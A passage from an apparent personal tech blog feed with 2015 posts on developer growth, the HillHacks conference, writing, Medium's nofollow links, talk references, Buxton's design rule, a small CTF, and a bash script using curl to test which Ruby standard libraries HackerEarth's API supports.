id="stay-updated">Stay Updated</h3> <p>Reading Hacker News is a fairly certain way of making sure of that. A person doing PHP development should be aware of things like Composer, HHVM, and perhaps the upcoming changes in PHP7 (They’re awesome). As a technologist, part of our job is to stay updated with trends (no matter how insane the JS framework wars sound). The code you will be writing 5 years from now will be in an entirely different framework than what you are using today. 
This doesn’t mean that you should start learning the ins and outs of every JS framework, but rather that you should be tangentially aware of developments happening in the space. (For eg, following stable updates of Rails even though you are not a Rails developer).</p> </li> <li> <h3 id="learn-more-languages">Learn more languages</h3> <p>I am a proud polyglot, and I very often realize that knowing more than one language changes your style and more importantly your thinking process significantly. For eg, a Ruby programmer will be fairly comfortable with the idea of metaprogramming compared to a PHP developer, and even more so when it might come to DSL (Domain Specific Languages). Similarly, knowing Haskell or Functional Programming in general teaches you a lot of things that you might re-use back in your JavaScript world. <br /> This doesn’t happen unless you know more than one language. Moreover, it’s always helpful to have JavaScript as your second language (if you are looking for one), because of its monopoly in front-end development. A lot of technologies (like CORS/JSONP) just don’t make sense unless you understand JavaScript.</p> </li> <li> <h3 id="concepts-matter">Concepts Matter</h3> <p>I was asking people about good interview questions, and one that I really liked was “How do you write an HTTP server using sockets?”. A lot of developers are stuck in this moat of “programming = software development”. And you can’t get over that unless you start thinking in terms of concepts. This is not me trying to get people to become Architecture Astronauts, but me trying to get people to understand how things work. I’ve interviewed people who have no idea about how HTTP works, and in my opinion you can’t really be a web developer without knowing HTTP. A fairly good filter for good web developers is whether they know the ins-and-outs of HTTP. And HTTP is not a programming challenge, but rather a conceptual problem. 
Similarly, if you work in the frontend, and you don’t know what the Same Origin Policy is, I am not gonna hire you. (“Is it implemented on the browser or the server?” is another good question). The point I’m trying to make is that you need to get a layer above your language’s standard library and understand how things work. Learning ActiveRecord is awesome, but do you understand how it works?</p> </li> <li> <h3 id="ship-products">Ship Products</h3> <p>Doesn’t matter if they are small, or made in a hackathon. As long as it’s shipped, we’re cool. If it’s not, come back when you’ve shipped it.</p> </li> <li> <h3 id="have-side-projects">Have side projects</h3> <p>This is slightly harder to do, but far more rewarding. Make sure that your side-project is not something you <em>expect</em> to make money out of, and that it has a fairly reasonable scope. Side projects are an excellent breeding ground for you to try out new technologies, and play around with new languages. It’s a really good breakaway from work-things as well, on top of that.</p> </li> <li> <h3 id="read-technical-books">Read technical books</h3> <p>As a start, I’d recommend everything that codinghorror has suggested <a href="https://blog.codinghorror.com/recommended-reading-for-developers/">here</a> and <a href="https://blog.codinghorror.com/programmers-dont-read-books-but-you-should/">here</a>. There are a lot of good books listed on hackershelf.com as well. 
My personal favorite is <a href="http://www.amazon.com/exec/obidos/ASIN/0321965515">Don’t Make Me Think</a>, which is a book on Web Usability and something I think every developer and designer should be forced to read.</p> </li> </ol> <p><strong>Thanks</strong> to <a href="https://shashankmehta.in">Shashank Mehta</a> for discussing these ideas with me and helping me frame this post.</p> HillHacks 2015 2015-07-20T00:00:00+00:00 https://captnemo.in/blog/2015/07/20/hillhacks <p>A little while back, I came across <a href="https://hillhacks.in" title="hacking and making in the Himalayas">HillHacks</a>, a conference in Dharamshala about “hacking and making in the Himalayas”. I was instantly hooked. It took a lot of scheduling troubles, but I decided to stay for the entire unconference, which started on 23rd May.</p> <p>It’s hard to describe the HillHacks experience in a single blog post. I met so many amazing people from all over the world. Learned a lot of different things. I had a lot of fun teaching some other things. I helped organize some of the stuff, and managed to stay awake an entire night while participating in a CTF. And on top of that, got to eat delicious food.</p> <p>HillHacks as an event, was divided into two segments:</p> <ul> <li>An unconference (23rd May - 3rd June)</li> <li>Main Conference (4-7 June)</li> </ul> <p>A lot of people had arrived before me at the venue and taken care of the basic infrastructure. We had internet connectivity via two local ISPs. 
We had IPv6 connectivity via a tunnel in Belgium as well.</p> <p>There were a lot of fun activities planned everyday: from unicycling to skateboarding and playing Cards against Humanity; it was a lot of fun living with so many strangers and trying to figure out ways to help.</p> <p>I did a talk on <a href="http://sdslabs.co" title="SDSLabs is a campus group at IIT Roorkee">SDSLabs</a>, a <a href="https://speakerdeck.com/captn3m0/hillhacks-quiz" title="Hillhacks Quiz">quiz for everyone</a>, and an <a href="http://slides.com/captn3m0/ctf#/" title="Slides from the talk">introductory session on CTF contests</a>. We then participated in a <a href="http://signup.sqrts.de/" title="Page is in german">CTF</a> organized in Germany as Team HillHacks. On the last day of the conference, I did a talk on “The Joy of Software Development”, which is a <a href="https://josd.captnemo.in/" title="Joy of Software Development Book Website">book I am working on</a>.</p> <p>For the first time in my life, I met people who actually use BSD. And to make it even more amazing, I met NetBSD Kernel developers, people on the BSD Security Team, and people who prefer OpenBSD over NetBSD (I’d never really cared for the distinction, as a Linux user)</p> <p>We did a lot of hacks, including running an MPD Daemon and streaming it over IceCast. I also spent a lot of time cubing and teaching people how to solve Rubik Cubes. My times have also improved somewhat as a result. Thanks to <a href="https://trouble.is/bio/" title="trouble's bio page">trouble</a>, I also learnt how to solve a MegaMinx.</p> <p>As part of the School Outreach program (organized by the brilliant <a href="https://twitter.com/mediatinker" title="Her twitter profile">Tink</a>), we taught kids about Codes and Ciphers, programming, speedcubing and lots of other things. 
The kids also performed in the final Gala Show giving us brilliant performances in 3 different plays (all 3 schools had their own plays).</p> <p>I learned a lot of different things: how to start with Kernel Programming, DNSSEC, Retro Gaming. Thanks to a few dedicated volunteers, we even made an 8-inch Telescope that made staring at the night sky so much fun. We had a session on Typography, a story telling session in Malayalam (translated to English on the fly). I even learnt a bit of Emacs.</p> <p>The list is so long, I don’t think I can do it justice in this single blog post.</p> <p>The most amazing part was not the technical things, but the community itself. <a href="https://twitter.com/sva" title="sva on twitter">sva</a> would often say that everyone of us has “sudo access on the conference” (geekspeak for full authority). Each of us helped organize it, any way we could. The community got together to set up the stage, tents, network and the entire infrastructure at HillHacks. Zainab even has a blog post on <a href="https://medium.com/@zainabbawa/on-community-and-the-art-of-various-cookings-511c31c33498" title="On community, and the art of various cookings">social cooking at Hillhacks</a>.</p> <p>As I sit here at the venue, it has been 2 weeks of fun and awesomeness here at HillHacks. I leave with lots of memories and hope to be here next year.</p> <p>If this blog post interests you, be sure to check out <a href="https://hackbeach.in" title="HackBeach wiki page">hackbeach</a> as well. We are doing a mini-conference around November in Kovalam.</p> Thoughts on Writing 2015-06-07T00:00:00+00:00 https://captnemo.in/blog/2015/06/07/on-writing <p>I have always wanted to be a writer. I think secretly us all reader-folk have that ambition. The joy of getting across your thoughts to another person without ever having met them is enormous.</p> <p>Most of my writing time these days is spent over email, chat or my not-so-frequent blog posts. 
I tend to do a lot of research while writing, and it takes up a lot of time. As such, my writing output tends to be diminutive compared to what I’d like.</p> <p>However, if you’ll go through my blog posts and emails, I write a lot about <em>trivial things</em>. Things that many people have already written about. Things that have probably been discussed to death, and where I have very little chance of actually coming up with something new.</p> <p>Should I still go ahead and write about it?</p> <p>This question has been bugging me for a while, especially as a blogger. I mostly write on technical topics these days. For instance, I have given talks on Software Development, UX Design, and even Bitcoin. I am nowhere close to being an authority on any of these things. Even in my specialized field of Web Development, there are so many things that I’m only barely aware of. So many things I am yet to even form my own opinions about. Topics I don’t even know exist.</p> <p>When I go and read an article about Software Development from <a href="http://www.joelonsoftware.com/" title="Joel on Software">Joel Spolsky</a>, or an article on Security by <a href="https://www.schneier.com/" title="Schneier on Security">Bruce Schneier</a>, or something on Startups by <a href="http://paulgraham.com/articles.html" title="Essays by Paul Graham">Paul Graham</a>, or <a href="https://news.ycombinator.com/threads?id=tptacek" title="tptacek's comments on HN">tptacek</a> on Hacker News; I instantly sit back and take notice: I know their credentials and the fact that they are speaking authoritatively on the topic. However, what can I, a meager undergrad with almost zero experience, write on such topics. 
Why should I even try, when there are people hundreds of times better who understand these things a thousand times better than me?</p> <p>In retrospect, this sounds quite similar to the <a href="https://en.wikipedia.org/wiki/Impostor_syndrome" title="Impostor syndrome">Imposter Syndrome</a>; and I’m not sure if this is exactly the same thing. I don’t get a feeling that I’m a fraud. I totally understand my own capabilities and successes, but the mere fact that there are people far better at what I’m doing is enough to dishearten me.</p> <p>I’ve given this a lot of thought. A really good summary of my response is in the following answer by <a href="http://www.prufrock451.com/" title="Official website for James Erwin">James Erwin</a>, author of Rome Sweet Rome in a reddit AMA to a question asking for writer advice:</p> <blockquote> <p>And if you’re going to write, write what you want to write. The odds against any creator are insane. If you’re going to devote months of your time, don’t let it be for an idea you think will sell. Odds are it won’t. Write something you want to write, or need to write. Write for yourself before anyone else. I’d rather read someone who is excited and passionate about what they want to say than someone who’s obviously trying to say what they think I want to hear.</p> <p>— <a href="https://www.reddit.com/r/IAmA/comments/2w72o7/so_i_sold_a_reddit_reply_to_warner_brothers_a_few/coo5gys" title="permalink to quote in his reddit ama thread">James Erwin</a></p> </blockquote> <p>I write, despite all these doubts, for the following reasons:</p> <ol> <li>Self-learning. A blog is an excellent way to keep track of your self-learning. It’s amazing to come back a few years later and see the things you were struggling with before. It’s equally amazing to do a trivial google search for an issue you face and find your own blog post or stackoverflow answer on the same.</li> <li>Sharing Knowledge. 
Yes, there are people who might know it better, but that shouldn’t mean I should keep my knowledge to myself. That would go against all the values that I stand for.</li> <li>Network Effect: Not in the strictest sense of the word, but my friend <a href="http://shashankmehta.in" title="Shashank's personal website">Shashank</a> recently brought this up. I have a circle of people who know me and would vouch for my credentials. For the same reason, they are more likely to trust me as a source, instead of a third person who they have no knowledge of.</li> <li>I love writing. The mere process of putting words down is enchanting for me.</li> </ol> <p>The next question that rises is: “What should I write about?”. Ruling out things I have no clue about, that still leaves a large number of topics I can cover. I am interested in UX Design, Hackers, Computer Security, Software Development, rationalism, skepticism, Free and Open Source movements, Political activism, Technocracy with a passing interest in several other fields such as cosmology and geek culture.</p> <p>I am not going to pick one every day and write about something new. I don’t want to write something rubbish just for the sake of writing it. I ultimately want to write because I have something to say. It doesn’t have to be unique or ground-breaking. What matters is that I <em>want to write about it</em>.</p> <p>A few days back someone contacted me on facebook asking me for advice on getting started with web development. I get a lot of these queries, mostly over facebook, email, and quora. Our conversation went back and forth with me suggesting resources, and he getting exceedingly confused over whether he should use codecademy or udacity, or coursera or something else.</p> <p>I have devoted a lot of time in my life to teaching people the nuances of these things. I have mentored many people, and acutely know the issues a beginner faces. 
In turn, I had <a href="https://twitter.com/kumar_ishan" title="Kumar Ishan">an amazing mentor</a> who taught me the importance of always learning things.</p> <p>All of this led me to realize one fact: I have been writing a lot about Software Development. Unfortunately, a lot of it is in private emails and chat. And I wanna write more about it, on a public medium.</p> <p>So, I’m announcing the next thing I’m working on: a book called <a href="">The Joy of Software Development</a>. A few obligatory links:</p> <ul> <li>The source code is available on <a href="https://github.com/captn3m0/the-joy-of-software-development" title="GitHub source for the book">GitHub</a>.</li> <li>It’s licensed under the <a href="https://creativecommons.org/licenses/by-sa/4.0/">CC-by-SA 4.0 license</a>.</li> <li>The canonical url for the site is <a href="https://josd.captnemo.in/" title="The Joy of Software Development">https://josd.captnemo.in/</a></li> <li>It’s hosted on the excellent <a href="http://gitbook.com/" title="GitBook">GitBook</a> platform, which automatically publishes each version as epub, mobi, and pdf as well.</li> <li>Who the <a href="https://josd.captnemo.in/content/hn.html" title="A few words to the HN community">target audience</a> for the book is.</li> <li>You can <a href="https://github.com/captn3m0/the-joy-of-software-development/issues/new" title="File a new issue for the book">file an issue</a> for critique on GitHub</li> </ul> <p>As expected, all the development, writing, and discussion on the book will be in the public, mostly on GitHub. I am writing this book, because I feel it needs to be written. I don’t expect it to be published, but that won’t stop me from writing it.</p> <p><a href="https://github.com/aartur" title="He's made hackerusesthis">Artur Siekielski</a> recently came across it, and wrote the following:</p> <blockquote> <p>The book you’re writing looks very good! 
It’s filling a niche as I don’t think there are any modern books that focus on “bird’s eye view”, and I see it would be helpful for many programmers to refresh knowledge.</p> </blockquote> <p>That gave me a bit of validation, as the only people who’d read it so far were my close friends.</p> <p>If you wanna support its development, you can do one of the following:</p> <ul> <li>Poke me on <a href="https://twitter.com/captn3m0" title="@captn3m0">twitter</a> or <a href="/contact/">email</a> and let me know you want to read it</li> <li><a href="https://josd.captnemo.in/" title="The Joy of Software Development">Subscribe</a> to the mailing list (I’ll send out updates there)</li> <li>Watch or Star the repo on <a href="https://github.com/captn3m0/the-joy-of-software-development" title="GitHub source for the book">GitHub</a>.</li> <li>See the <a href="https://github.com/captn3m0/the-joy-of-software-development/blob/master/CONTRIBUTING.md" title="Contributing Guide on GitHub">CONTRIBUTING</a> file on github for contributing to the text.</li> </ul> <p>Asking for Donations might sound weird to some. I don’t really need the money, but I think I’d get an additional sense of responsibility towards finishing it if people start giving me money. I will be donating the entire proceeds to <a href="https://www.eff.org/" title="Electronic Frontier Foundation">EFF</a>.</p> Medium abuses nofollow 2015-04-06T00:00:00+00:00 https://captnemo.in/blog/2015/04/06/medium-abuses-nofollow <p><strong>Update</strong>: Since I published this post, I have changed my opinion somewhat on the matter. This post is <a href="https://news.ycombinator.com/item?id=9328384">quite confrontational</a> and I didn’t mean it to be that way. Medium is not wrong in this matter, but I still think we need to look for better solutions. 
I have since been working on a <a href="https://github.com/captn3m0/ideas/blob/master/BADIDEAS.md#-nofollow-enforcer">proposal/idea</a> that would use machine learning to “solve” this problem, instead of side-stepping it.</p> <p>I call <a href="https://medium.com" rel="nofollow" title="This is a nofollow link">medium</a> a “<em>mostly good</em>” platform for lazy writers. A lot of people have written about its excellent typography, or it being the next “big publishing platform”. I’ve used medium in the past, and while it does have its benefits, I have stopped using it.</p> <p>My primary reason was that I already have a blog, where I can control the entire experience. This is the same reason why New York Times does not start publishing articles on Medium.</p> <p>The other reason is nofollow abuse.</p> <p>Medium hosts more than <a href="https://www.google.co.in/webhp?q=site%3Amedium.com#q=site:medium.com">1M indexed pages</a>. It has around <a href="https://medium.com/editors-picks">650k users</a> currently by <a href="https://www.quora.com/How-many-users-does-Medium-have/answer/Josh-Yang">a conservative estimate</a>. Rounding it to 700k to account for other users, collections, and other internal pages, it leaves us with around 300,000 articles on medium.</p> <p>A basic tenet of the web is linkability. That is what Tim Berners Lee meant when he talked about HyperText:</p> <blockquote> <p>HyperText is a way to link and access information of various kinds as a web of nodes in which the user can browse at will.</p> </blockquote> <p>Over time, the web has evolved, and is now not just limited to human users, but to computers as well. This is an important consideration on which the web rests today. The biggest example of this is Google Search, which uses these links to “follow, spider, and index” the web. 
Google uses this linking information to build a citation index, which gives us the quality of a web page depending on the quality and number of sites that link to it.</p> <p>If you know a bit or two about SEO, you might have heard of shady backlink techniques, which essentially amount to you getting links from an established site. This often takes the form of user-generated content such as comments and answers.</p> <p>While fighting spam is important, it is far more important to make sure that web remains linked, that people are credited for the content they create. Medium hosts 300,000 articles published by half a million users, and yet none of these links back to external website, because of something called “rel=nofollow”.</p> <p>When a link has a <code class="language-plaintext highlighter-rouge">rel=nofollow</code> attribute, search engines do not count it as a citation in their index. While this may be the right strategy for comments on a wordpress blog to prevent spam, this is not the right way to move forward if you want to “revolutionize the publishing industry”.</p> <p>While medium is not as bad as some other sites in this regard (like quora, which even blocks the internet archive), it is very important because it portrays itself as a “publishing platform”. This means, medium is made up of articles, blog posts, with lots of outbound links compared to, for instance, StackOverflow answers (which <a href="http://meta.stackexchange.com/questions/111279/remove-nofollow-on-links-deemed-reputable">solved this problem back in 2011</a>).</p> <p>If you publish content on medium, and provide relevant links for your readers, remember that these links are not considered as relevant by search engines.</p> <p>Medium has said that this is <a href="https://twitter.com/lenkendall/status/432203084270292992">not a top priority</a> at the moment for them.</p> <p>I understand completely. 
Handling spam would be a far harder problem to solve than just blacklisting all outbound links. But we cannot go this way, if we want an open web. We need publishing platforms that cite content, and not blacklist it. This is why I write content on my own blog, and not on medium.</p> Blog post on recent talk 2015-03-20T00:00:00+00:00 https://captnemo.in/blog/2015/03/20/josd-talk <p>So I recently did a talk on Joy of Software Development. You can read more about the talk <a href="https://captnemo.in/talks/josd/">here</a> (link includes slides and list of topics covered). This post is devoted to the references I’d promised to link to in the talk. Since it was an introductory talk, and I didn’t want to bore people to death, I decided to cover lots of topics at a shallow depth, instead of covering a few topics deeply.</p> <p>This means that I need to post more material for people to follow up on. So, this is that reference blog post. Make sure you have a copy of the slides open as you go through these links.</p> <p><em>Update</em>: I also gave this talk (with a few updates) at <a href="https://www.geekskool.com/">GeekSkool</a> in October 2015.</p> <h2 id="software-development-in-general">Software Development in general</h2> <ul> <li><a href="http://sockpuppet.org/blog/2015/03/06/the-hiring-post/">Hiring in software industry is broken</a></li> <li><a href="http://c2.com/cgi/wiki?BreadthFirstLearning">Breadth First Learning</a></li> <li><a href="http://blog.codinghorror.com/recommended-reading-for-developers/">Recommended readings for developers</a> by Jeff Atwood (codinghorror)</li> <li><a href="http://blog.codinghorror.com/version-1-sucks-but-ship-it-anyway/">Ship v1, even if it sucks</a></li> <li><a href="https://web.archive.org/web/20160504181428/http://mstrick.com/ship-early-and-often/">Ship early, ship often</a></li> <li><a href="http://www.joelonsoftware.com/articles/fog0000000069.html">Never rewrite, always refactor</a> by Joel Spolsky</li> <li><a 
href="http://www.joelonsoftware.com/articles/fog0000000043.html">The Joel Test</a> to score a software company.</li> </ul> <h2 id="software-security">Software Security</h2> <ul> <li><a href="https://news.ycombinator.com/item?id=9164895">Security is the opposite of obscurity</a></li> <li><a href="https://owasp.org/www-project-top-ten/">OWASP Top 10</a></li> <li><a href="https://class.coursera.org/softwaresec-002">Software Security</a> course on coursera</li> <li><a href="https://ctftime.org">CTFTime</a> - See upcoming CTF contests</li> <li><a href="http://io.smashthestack.org/">SmashTheStack</a> - Learn buffer overflow attacks</li> <li><a href="https://exploit-exercises.lains.space/nebula/">Nebula Exploit Exercises</a></li> <li><a href="https://backdoor.sdslabs.co/">Backdoor</a> - Security CTF platform for beginners by SDSLabs</li> </ul> <h3 id="starting-advice">Starting Advice</h3> <ul> <li><a href="http://codahale.com/how-to-safely-store-a-password/">Use bcrypt</a></li> <li><a href="http://security.stackexchange.com/">Ask questions on Security.SE</a></li> <li><a href="http://c2.com/cgi/wiki?PrincipleOfLeastPrivilege">Principle Of Least Privilege</a></li> <li><a href="http://stackoverflow.com/a/2794089/368328">Never trust user input</a></li> </ul> <h2 id="agnostic-software-development">Agnostic Software Development</h2> <ul> <li><a href="http://programmers.stackexchange.com/questions/1189/what-should-i-do-to-be-language-agnostic">What should I do to be language-agnostic?</a></li> <li><a href="https://pragprog.com/book/btlang/seven-languages-in-seven-weeks">Seven languages in seven weeks</a> (Book)</li> <li><a href="http://c2.com/cgi/wiki?PickTheRightToolForTheJob">Right tool for the job</a></li> <li><a href="http://c2.com/cgi/wiki?LanguageAgnostic">Language Agnostic</a></li> <li><a href="http://programmers.stackexchange.com/questions/64701/balance-between-right-tool-for-the-job-and-familiarity">Balance between “right tool for the job” and familiarity</a></li> 
</ul> <h2 id="free-and-open-source-development">Free and open source development</h2> <ul> <li><a href="https://www.gnu.org/philosophy/open-source-misses-the-point.html">Why Open Source misses the point of Free Software</a> - by Richard Stallman</li> <li><a href="http://opensource.org/osd-annotated">Open source definition</a></li> <li><a href="http://choosealicense.com/">Choose a license</a></li> <li><a href="https://www.gnu.org/philosophy/free-sw.html">What is free software?</a></li> <li><a href="http://www.wired.com/2013/09/why-free-software-is-more-important-now-than-ever-before/">Why Free Software Movement is important</a></li> <li><a href="https://www.mozilla.org/en-US/mission/">Mozilla mission statement</a></li> </ul> <h2 id="version-control">Version Control</h2> <ul> <li><a href="http://git-scm.com/book/en/v2">Pro Git</a> (Book)</li> <li><a href="https://try.github.io/levels/1/challenges/1">Learn Git in your browser</a></li> <li><a href="https://web.archive.org/web/20180926172759/http://hginit.com/">Hg Init</a> Mercurial tutorial</li> <li><a href="http://stackoverflow.com/questions/35837/what-is-the-difference-between-mercurial-and-git">Difference between Hg and Git</a></li> <li><a href="https://z.github.io/whygitisbetter/">Benefits of git</a></li> <li><a href="http://nvie.com/posts/a-successful-git-branching-model/">Must read post on git branching model</a></li> <li><a href="https://www.kernel.org/pub/software/scm/git/docs/everyday.html">Git in 20 commands</a></li> </ul> <h2 id="tests">Tests</h2> <p>During the talk, I decidedly used the term TDD incorrectly. TDD technically means going test first, but I used it as an introduction to testing in general. This was intentional. 
The links here will use TDD in the correct sense.</p> <ul> <li><a href="http://code.tutsplus.com/tutorials/beginning-test-driven-development-in-python--net-30137">Test Driven Development Tutorial</a></li> <li><a href="http://programmers.stackexchange.com/questions/41409/why-does-tdd-work">Why TDD works</a></li> <li><a href="http://programmers.stackexchange.com/questions/66480/when-is-it-appropriate-to-not-unit-test">How much to cover in tests</a></li> <li><a href="http://blog.codinghorror.com/i-pity-the-fool-who-doesnt-write-unit-tests/">Importance of testing</a> - Jeff Atwood</li> <li><a href="http://sd.jtimothyking.com/2006/07/11/twelve-benefits-of-writing-unit-tests-first/">Benefits of going test first</a></li> <li><a href="https://leif.me/on-testing-culture-in-github-projects/">Testing culture at github</a></li> <li><a href="https://github.com/captn3m0/talks/blob/gh-pages/josd/code/code2.js">Source code I used in talk</a></li> </ul> <h2 id="rest-and-apis">REST and APIs</h2> <ul> <li><a href="https://www.quora.com/How-did-Roy-Fieldings-introduction-of-REST-in-his-2000-doctoral-thesis-impact-the-internet">Why was REST a breakthrough</a></li> <li><a href="http://www.looah.com/source/view/2284">A simple lucid explanation of REST</a></li> <li><a href="http://www.programmableweb.com/">What API to use</a></li> <li><a href="http://c2.com/cgi/wiki?NotInventedHere">NIH Syndrome</a></li> </ul> <h2 id="unix-philosophy">Unix Philosophy</h2> <ul> <li>The epic <a href="http://www.leancrew.com/all-this/2011/12/more-shell-less-egg/#fnref:pipe">Knuth vs McIlroy</a> story</li> <li><a href="http://www.catb.org/jargon/html/Z/Zawinskis-Law.html">Zawinski’s Law</a></li> <li><a href="http://onethingwell.org/">http://onethingwell.org/</a></li> <li><a href="https://en.wikipedia.org/wiki/Unix_philosophy">Wikipedia article</a> on the topic is surprisingly good</li> <li><a href="http://unix.stackexchange.com/questions/30759/whats-a-good-example-of-piping-commands-together">Good examples of 
pipes</a></li> </ul> <h2 id="books">Books</h2> <p>These are books I absolutely recommend every software developer to read, in order.</p> <ol> <li><a href="http://blog.codinghorror.com/dont-make-me-think-second-edition/">Don’t Make Me Think</a></li> <li><a href="https://pragprog.com/titles/tpp20/the-pragmatic-programmer-20th-anniversary-edition/">The Pragmatic Programmer</a></li> </ol> <p>Other than these, I recommend reading Code Complete, Mythical Man Month, and everything by Jeff Atwood and Zach Holman, but only after you have read the above 2 books.</p> <h2 id="how-to-get-better-at-software-development">How to get better at Software Development?</h2> <p>This is just a small list of topics I cover in a recent blog post. This is only present in the updated version of the talk which I gave at GeekSkool. You can read the blog post <a href="/blog/2015/10/12/get-better-at-software-development/">here</a> to look at the points I make.</p> <hr /> <p>Phew. That was a lot of links. If you are ever interested in learning more about software development, feel free to <a href="/contact/">contact me</a>. If you ever feel like chatting with me, I’m usually online at <a href="https://chat.sdslabs.co">chat.sdslabs.co</a>.</p> Buxton's Rule 2015-03-08T00:00:00+00:00 https://captnemo.in/blog/2015/03/08/buxtons-rule <p>I consider myself a UX enthusiast. I consider that term to aptly describe my interest in UX. As I’m deeply involved in many UX and design decisions, I try to be well read on design and UX principles. 
While reading a discussion about <a href="http://www.cultofmac.com/181782/every-iphone-prototype-apple-ever-made-before-released-the-first-iphone-gallery/" title="Every iPhone Prototype Apple ever made before releasing the first iPhone">iPhone prototypes</a> on <a href="https://news.ycombinator.com/item?id=4312460" title="Hacker News Discussion">HN</a> in June ‘12, I came across this comment:</p> <blockquote> <p>Goes to show what it takes to achieve excellence: lots of trial and error. Produce at least 3 alternatives for every design decision (Bill Buxton agrees).</p> <p>— <a href="https://news.ycombinator.com/item?id=4312953">mstuherl</a></p> </blockquote> <p>It sounded so basic, yet often I see designers trying to defend their first design, because it seems good enough to them. No good design is ever born at the first step. Just like any other process, it takes multiple iterations to perfect it.</p> <p>I recently got in touch with Morgan (<a href="https://news.ycombinator.com/user?id=msutherl" title="HN profile">mstuherl on HN</a>), and thanked him for his comment. Here’s what he said when I told him I wanted to dub it mstuherl’s rule:</p> <blockquote> <p>Hah! My name’s Morgan, so you can call it Morgan’s Rule if you like, but it comes from Bill, so Buxton’s rule would be more appropriate. His book Sketching User Experience contains yet more wisdom!</p> </blockquote> <p>So that’s what I’m calling it:</p> <div> <center> <h3> BUXTON'S RULE <br /> Produce at least 3 alternatives for every design decision. 
</h3> </center> </div> <h2 id="further-reading">Further Reading</h2> <ul> <li><a href="http://www.billbuxton.com/iteration.html">Iteration in the Design of the Human-Computer Interface</a> - Bill Buxton</li> <li><a href="http://www.amazon.com/Sketching-User-Experiences-Interactive-Technologies/dp/0123740371">Sketching User Experiences</a> by Bill Buxton</li> <li><a href="http://www.sensible.com/dmmt.html">Don’t Make Me Think</a> by Steve Krug (My first recommendation to every software dev/designer)</li> </ul> scytheCTF and Updates 2015-02-27T00:00:00+00:00 https://captnemo.in/blog/2015/02/27/scythe-ctf-updates <p>February has been an interesting month for me. I haven’t been programming a lot, but have definitely been writing a lot. I have got a few more upcoming projects as well, which I’d love to announce soon.</p> <p>We recently held a short 8-hour CTF (scytheCTF) on Backdoor. I made two challenges for the CTF:</p> <ul> <li><a href="https://backdoor.sdslabs.co/challenges/SHITTY-OTP">SHITTY-OTP</a></li> <li><a href="https://backdoor.sdslabs.co/challenges/LOST-FOUND">LOST-FOUND</a></li> </ul> <p>Both of these problems were rush jobs because of several reasons:</p> <ol> <li>We didn’t have much time to set the problems.</li> <li>We didn’t expect much participation in scytheCTF.</li> <li>scytheCTF was a test CTF, just to figure out any issues with the internet launch of Backdoor.</li> <li>scythe is also supposed to be beginner friendly, unlike our annual BackdoorCTF, which will include much harder problems.</li> </ol> <p>I had a lot of fun with <a href="https://twitter.com/kandoiabhi">@kandoiabhi</a> in setting the problems. It was also great seeing <a href="https://twitter.com/DefConUA">@DefConUA</a> participate in such a small-scale contest.</p> <p>Other than scythe, we recently had our annual SDSLabs trip to Rishikesh, which I enjoyed a lot. 
I also wrote a small post on <a href="/setup/">my work setup</a>.</p> How I found a bug in HackerEarth 2015-02-12T00:00:00+00:00 https://captnemo.in/blog/2015/02/12/hackerearth-bug <p><em><a href="https://www.hackerearth.com/notes/how-i-found-a-bug-in-hackerearth/" title="Permalink to How I found a bug in HackerEarth">Source</a></em></p> <p>I am not a competitive programmer. I love programming, but more so I love building things. As a result, I rarely participate in coding contests. Even when I do, I try to use languages like Ruby and Python just to see if I can do it <em>my way</em>, so to speak.</p> <p>While trying a contest in Ruby, I realized that I could not use the ruby <code class="language-plaintext highlighter-rouge">prime</code> library. This is a standard library in Ruby for a long while, and HackerEarth platform runs on 2.1.1, which is quite new.</p> <p>I reported this as a bug to HackerEarth in September ‘14. A quick reply from HE made me realize that they weren’t understanding the issue:</p> <blockquote> <p>Modules like mathn or erb are part of standard library. They are available.</p> <p>Try using, require ‘erb’require ‘mathn’ in code editor.<br /> However 3rd party libraries are not available.</p> </blockquote> <p>I decided to do some tests and check <em>all standard libraries</em> for their availability. 
For those unfamiliar with Ruby, this is how you load a standard library in ruby:</p> <p><code class="language-plaintext highlighter-rouge">require 'prime'</code></p> <p>Using the HackerEarth API, I was able to write some quick code that tested all expected libraries:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>while read -r lib; do
  # URL-encoded Ruby source: require 'LIB'
  SOURCE="require%20'$lib'"
  echo "Testing $lib"
  # Names such as io/console contain a slash, so create the directory first
  mkdir -p "$(dirname "$lib")"
  # API_SECRET stands in for the HackerEarth client secret
  curl -s -d "client_secret=API_SECRET&amp;lang=RUBY&amp;async=0&amp;source=$SOURCE" http://api.hackerearth.com/code/run/ &gt; "$lib.json"
done &lt; libs.txt
</code></pre></div></div> <p>Here <code class="language-plaintext highlighter-rouge">libs.txt</code> contains a list of all standard libraries. The above code is in bash, and makes use of curl. Parsing the results, I replied with the following:</p> <blockquote> <p>Requiring the following libraries raises a missing error:</p> <p>coverage - RE<br /> extmk - RE<br /> fiddle - RE<br /> io/console - RE<br /> json - RE<br /> minitest - RE<br /> minitest/benchmark - RE<br /> minitest/spec - RE<br /> mkmf - RE<br /> objspace - RE<br /> prime - RE<br /> psych - RE<br /> racc - RE<br /> rake - RE<br /> rdoc - RE<br /> rexml - RE<br /> rinda - RE<br /> ripper - RE<br /> rubygems - RE<br /> tk - RE<br /> win32ole - RE<br /> xmlrpc - RE</p> </blockquote> <p>HackerEarth admitted the issue (I posted code to replicate on <a href="https://github.com/captn3m0/ruby-stdlib-test-hackerearth" title="HackerEarth Ruby stdlib Tests">github</a>), and have since worked on it. 
I just ran the tests again, and only the following libraries are unavailable now:</p> <blockquote> <p>curses - RE<br /> dbm - RE<br /> debug - RE<br /> extmk - RE<br /> gdbm - RE<br /> generator - RE<br /> iconv - RE<br /> racc - RE<br /> readline - RE<br /> rexml - RE<br /> rinda - RE<br /> tk - RE<br /> win32ole - RE</p> </blockquote> <p>A few of these are understandable (<code class="language-plaintext highlighter-rouge">win32</code> since HE platform runs on Linux, and <code class="language-plaintext highlighter-rouge">tk</code>, which is a graphical library). A few of these are unavailable in Ruby 2.1.1 (I copied the list of libs from the 2.1.3 docs).</p> <p>Kudos to HackerEarth for fixing a bug that very few of their users would have faced. All the source code for this post can be found at <a href="https://github.com/captn3m0/ruby-stdlib-test-hackerearth" title="HackerEarth Ruby stdlib Tests">github</a>.</p> <p><em>Note</em>: This article was copied from HackerEarth because they are shutting down their notes platform.</p> I am offended 2015-02-06T00:00:00+00:00 https://captnemo.in/blog/2015/02/06/i-am-offended <p>To start with, here’s a piece of art that <em>is meant to offend you</em>:</p> <p><a href="/img/bharatmata.jpg"><img src="/img/bharatmata_thumb.jpg" alt="Bharat Mata, by MF Hussain" /></a></p> <p>The above is an artwork by MF Hussain. It was sold as an untitled work by 